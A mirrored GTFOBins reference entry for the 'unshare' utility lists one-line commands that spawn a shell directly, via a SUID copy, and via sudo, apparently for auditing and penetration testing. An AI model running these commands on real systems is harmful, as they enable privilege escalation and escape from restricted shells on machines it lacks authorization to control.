mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
10 lines
138 B
Markdown
10 lines
138 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: unshare /bin/sh
|
|
suid:
|
|
- code: ./unshare -r /bin/sh
|
|
sudo:
|
|
- code: sudo unshare /bin/sh
|
|
---
|